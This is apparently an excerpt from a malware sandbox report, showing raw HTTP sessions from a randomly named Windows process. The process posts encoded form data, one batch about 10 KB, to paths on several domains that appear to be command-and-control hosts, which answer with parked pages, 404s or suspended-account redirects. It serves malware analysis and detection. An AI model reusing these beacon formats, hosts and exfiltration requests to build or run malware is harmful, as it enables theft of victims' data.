                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_a631AbOZG8JUGk42XSOPVi45Ptq5ZWIiWe69Wsht9oPBgPk+3b+os+d8jOfLia2xIq1ZmHNnK2Q/AhRAt+ohBw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 31, 2024 01:40:06.732595921 CET | 919 | IN
                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDY3NjM4MDQtMDExZi00YWViLTk5YmYtM2JjZTExMGQ0N2MxIiwicGFnZV90aW1lIjoxNzMwMzM1Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 50044 | 217.76.156.252 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:40:12.043965101 CET | 704 | OUT | POST /dma3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cesach.net
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cesach.net
                                                                                                                                                                              Referer: http://www.cesach.net/dma3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=FjnvS1XHEDZo/MTYGU7DOaR4jFqhIEz3nkD+ghhFuTqKAXClwU+Q1oAqWMXWOc5Nqm5+7u24nXLmrqiP9ovGnUJIeFdAFgcsUEVo4d1JAGCJbxXTk36forPZsUS3Z7eKJHtP1tlo1J9OTBLOEipOah5u3WA9l+5kUTvjnbX1y28Bx31dkkQk5u/+cwxPW5gDjQ==
Oct 31, 2024 01:40:12.916357994 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:12 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              X-ServerIndex: llim605
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Data Ascii: 1a9b<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.cesach.net</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> [TRUNCATED]
Oct 31, 2024 01:40:12.916606903 CET | 212 | IN
                                                                                                                                                                              Data Ascii: <h1>www.cesach.net</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL--
Oct 31, 2024 01:40:12.916616917 CET | 1236 | IN
                                                                                                                                                                              Data Ascii: >...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header>... end client -->... foot -->...COMIENZA_PIE_POR_DEFECTO--><section class="search"> <div class="center"> <di
Oct 31, 2024 01:40:12.916621923 CET | 212 | IN
                                                                                                                                                                              Data Ascii: ctos en la parte inferior.</p> </div></aside><section class="simple"> <span>Nuestros Productos</span> <div class="line"> <div class="center"> <a href="https://www.piensaso
                                                                                                                                                                              Oct 31, 2024 01:40:12.916631937 CET1236INData Raw: 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 77 65 62 2d 73 65 6e 63 69 6c 6c 61 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6c 69 6e 6b 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 77
                                                                                                                                                                              Data Ascii: lutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=web-sencilla"><article> <img src="https://piensasolutions.com/imgs/parking/icon-web-sencilla.png"> <h2>WEB SENCILLA</h2>
                                                                                                                                                                              Oct 31, 2024 01:40:12.916641951 CET1236INData Raw: 64 65 20 75 6e 61 20 6d 61 6e 65 72 61 20 72 26 61 61 63 75 74 65 3b 70 69 64 61 20 79 20 73 65 6e 63 69 6c 6c 61 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 3e 76 65 72 20 6d 26 61 61 63 75 74 65 3b
                                                                                                                                                                              Data Ascii: de una manera r&aacute;pida y sencilla.</p> <button>ver m&aacute;s</button> </article></a> <a href="https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campa
                                                                                                                                                                              Oct 31, 2024 01:40:12.916654110 CET1236INData Raw: 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 3e 54 65 20 6f 66 72 65 63 65 6d 6f 73 20 73 69 65 6d 70 65 20 65 6c 20 6d 65 6a 6f 72 20 70 72 65 63 69 6f 3a 20 64 65 73 64 65 20 65 6c 20 70 72 69 6d 65 72 20 64 26 69 61 63 75 74 65 3b 61 20 79 20
                                                                                                                                                                              Data Ascii: an> <p>Te ofrecemos siempe el mejor precio: desde el primer d&iacute;a y desde el primer dominio. Adem&aacute;s tu dominio incluye:</p> <ul> <li><i class="icon-ok"></i> P&aacute;gina de presentaci&oacute;n config
                                                                                                                                                                              Oct 31, 2024 01:40:12.916665077 CET436INData Raw: 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 69 6d 67 73 2f 70 61 72 6b 69 6e 67 2f 69 63 6f 6e 2d 74 77 69 74 74 65 72 2d 73 6d 61 6c 6c 2e 70 6e 67 22 3e 3c 2f 64 69 76 3e 54 77 69 74 74 65 72 3c 2f 61 3e 0d 0a 20 20 20
                                                                                                                                                                              Data Ascii: ://piensasolutions.com/imgs/parking/icon-twitter-small.png"></div>Twitter</a> </li> ...<li> <a href="https://plus.google.com/u/0/102310483732773374239" class="lower" target="_blank" title="Sguenos en Google+">


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 50045 | 217.76.156.252 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:40:14.667103052 CET | 724 | OUT | POST /dma3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cesach.net
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cesach.net
                                                                                                                                                                              Referer: http://www.cesach.net/dma3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=FjnvS1XHEDZo+tDYE3TDf6R7n1qhCkz7nkf+glZVugOKA1KlxV+QgoAqesXTD85Gqm927uK4nXvmro6P9fDFmEJOVldeYQcsUEVo4ZdjAG6JbDDT2DWc3bPa7kS3d7eOJHsa1spG1LVOTDDOF3dNNx5o42Bis7IONCWzn9bZwkIQ9R4H1VxzrubNB347b6dK4bWw9oPKsIm42yct35eUKCU=
Oct 31, 2024 01:40:15.514626026 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:15 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              X-ServerIndex: llim604
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 50046 | 217.76.156.252 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:40:17.211189985 CET | 10806 | OUT | POST /dma3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cesach.net
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cesach.net
                                                                                                                                                                              Referer: http://www.cesach.net/dma3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:40:18.090936899 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:17 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              X-ServerIndex: llim603
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 50047 | 217.76.156.252 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:40:19.751441956 CET | 449 | OUT | GET /dma3/?hrOd=1DzdIBZXhZaHw2Wp&78=IhPPRAmDChEnx8G5Mk3wYKJVvliqClSy7lT3/i9hniKwN2WP3nmtzIAyaYX2MoR3jQRU/NaT7iTCvd3O/fPSuEFMVnQWNGAOAVxjgpJaGw2AUh+P10Czoew= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cesach.net
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:40:20.624912977 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:20 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              X-ServerIndex: llim605
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Data Ascii: 1a9b<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.cesach.net</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> [TRUNCATED]
Oct 31, 2024 01:40:20.624928951 CET | 1236 | IN | Data Raw: 3c 68 31 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e
                                                                                                                                                                              Data Ascii: <h1>www.cesach.net</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL-->
Oct 31, 2024 01:40:20.624938011 CET | 1236 | IN | Data Raw: 6d 2f 69 6d 67 73 2f 70 61 72 6b 69 6e 67 2f 69 63 6f 6e 2d 64 65 73 70 6c 65 67 61 72 2e 6a 70 67 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 57 45 42 20 41 4c 4f 4a 41 44 41 20 45 4e 20 50 49 45 4e 53 41 20 53 4f 4c 55 54 49 4f 4e 53
                                                                                                                                                                              Data Ascii: m/imgs/parking/icon-desplegar.jpg"> <span>WEB ALOJADA EN PIENSA SOLUTIONS</span> <p>Si quieres obtener m&aacute;s informaci&oacute;n para crear tu propio proyecto online, consulta nuestros productos en la parte inferior.</p>
Oct 31, 2024 01:40:20.624989033 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 3e 76 65 72 20 6d 26 61 61 63 75 74 65 3b 73 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <button>ver m&aacute;s</button> </article></a> <a href="https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=web"><article> <img src="https:/
Oct 31, 2024 01:40:20.625000954 CET | 1236 | IN | Data Raw: 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 43 6f 72 72 65 6f 20 63 6f 6e 20 61 63 63 65 73 6f 20 73 65 67 75 72 6f 20 70 61 72 61 20 74 75 73 20 62 75 7a 6f 6e 65 73 2e 20 43 6f 6e 20 66 75 6e 63 69 6f 6e 61 6c
                                                                                                                                                                              Data Ascii: </h2> <p>Correo con acceso seguro para tus buzones. Con funcionalidades colaborativas. </p> <button>ver m&aacute;s</button> </article></a>--> </div> </div></section><section cl
Oct 31, 2024 01:40:20.625010967 CET | 860 | IN | Data Raw: 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 22 20 63 6c 61 73 73 3d 22 6c 6f 77 65
                                                                                                                                                                              Data Ascii: <li> <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="Sguenos en Facebook"> <img src="https://piensasolutions.com/imgs/parking/icon-facebook-small.png"></div>Facebook</a>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 50048 | 144.76.190.39 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:40:25.839320898 CET | 731 | OUT | POST /3xn5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.basicreviews.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.basicreviews.online
                                                                                                                                                                              Referer: http://www.basicreviews.online/3xn5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=sJ/b/IKXRpCl1hxDMglwh/3f9n/3T6R5RQJ0LRUPgEkCT7E525+yAvCFcjUgUVGiqwlQU5Zu2+Y0vkI15jS1hAo9cX9pa139We4BfmPPtx36zZV9/WQ/9+qGlDkycC18TB7hqtMNLxfJuqIeZQVjOWjWWdw8BU4rc77Wc3/F8ozYkgbCmwA6Ktyq/rt1J/Z7XQ==
Oct 31, 2024 01:40:26.690713882 CET | 1045 | IN | HTTP/1.1 302 Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 771
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:40:26 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 50049 | 144.76.190.39 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:40:28.374691010 CET | 751 | OUT | POST /3xn5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.basicreviews.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.basicreviews.online
                                                                                                                                                                              Referer: http://www.basicreviews.online/3xn5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=sJ/b/IKXRpCl6ghDOAZw1v3Yj3/3ZaR1RR10LUlUg2ACd+4534+yHvCFTDUpa1G9qwpiU8hu2640vhs14UO0hQozdn9rUV39We4Bfin1txP6zpl9tHQw8+qFiDkyYC14TB7TqsQ3L3DJur4eeBVsZGjULNwtI3VTS4WnaRyi6YvDlmWY3BhtYtWZiskBE8kyMdjEYgbv0tYZlmjEhQAVBoY=
Oct 31, 2024 01:40:29.237567902 CET | 1045 | IN | HTTP/1.1 302 Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 771
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:40:29 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 50050 | 144.76.190.39 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:40:30.925148010 CET | 10833 | OUT | POST /3xn5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.basicreviews.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.basicreviews.online
                                                                                                                                                                              Referer: http://www.basicreviews.online/3xn5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=sJ/b/IKXRpCl6ghDOAZw1v3Yj3/3ZaR1RR10LUlUg2ICdL051bWyGvCFNzUka1GwqwxmU88Z24A0sCU1xFO0qQozYX9ma13SWepGfmD1txP6zr999mQwxeqGlDkAcC1QTBzpqsVKLBzJuLoefz9sG2jSINxwI3ZMS57YaRvF6azDknvgsQFqN/+Q+b4FAMtrUvm8dS7Usu4binag9C02Udzjmrgttq1Wba7YsRZqtsiZfJ0TPtAp8IFjuw/KjwIB/8OzeLYba99LrvHTyyY5bH1KbGTO+s4y4dkr3lbfD/3P5tB7vGrFH++JZs1ImAOrF8k2S9h4LyQLYqz9kxSRtoZQlORAUgKe3EDbOdewEZkyOJLwzdObdCgkNhacafYOSr/GVHnpWf8QYpoNkIDhUjou+sYnLIkbi48UbigHRZUHys++vVJGzNy0q/MZmdUMrVoahNTGW2W6nixdMsk6M7zSnxE1WNKgwLTs2Zy8x5cFnBGuSc2aLk7Yanzk+RuAQW2A5UDfpHgKke8RkM/mDVB0Z5uPWkSeyRGUFIaCYIRuwg9OFswDxY5/S0AnGhrgAhYS2EmgYcDA2lb4cTnGwFfwq7XqHpt/o6Gg786ThG9n85R9VCfIGVBG+s2iCuIZGCLxgEfATvTZlqpHuSFbOfOa5DBQ9Z+Eu14UOpZVXJqfmcjpqCjvUW0U9QKE3OJrR3Awe3RTezmndU6XJZHV+Z+0zNRPlPafYEAYHId1fPWvQXuTrGEgikq5sOIbYHlhDy4p9yrSmzfe3nv7GxfZBEIakA62V+xfkFIxmbJaQIFb6W+3yim5UxC4vzccLeh3flH959ueWfMRCpupWfkUc5ZcjWXvjRD1UCADSaSroGj9ElNAl4yEV3fBPRAF7+XnKmIT5d5aU3ewePi5MsxKx0xKSOow6fJPUq5h3srqkt0E8pY6jMjsi7O1VXEEyMMWdvexEpuCc5ZcT2utpVvHS0sho6btj0QLsgf08lWGMh8rAiLS7 [TRUNCATED]
Oct 31, 2024 01:40:31.773847103 CET  1045               IN         HTTP/1.1 302 Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 771
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:40:31 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
44          192.168.2.4  50051        144.76.190.39   80                3132  C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 31, 2024 01:40:33.467539072 CET  458                OUT        GET /3xn5/?78=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.basicreviews.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:40:34.328188896 CET  1191               IN         HTTP/1.1 302 Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 771
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:40:34 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?78=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&hrOd=1DzdIBZXhZaHw2Wp
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
45          192.168.2.4  50052        34.92.128.59    80                3132  C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe

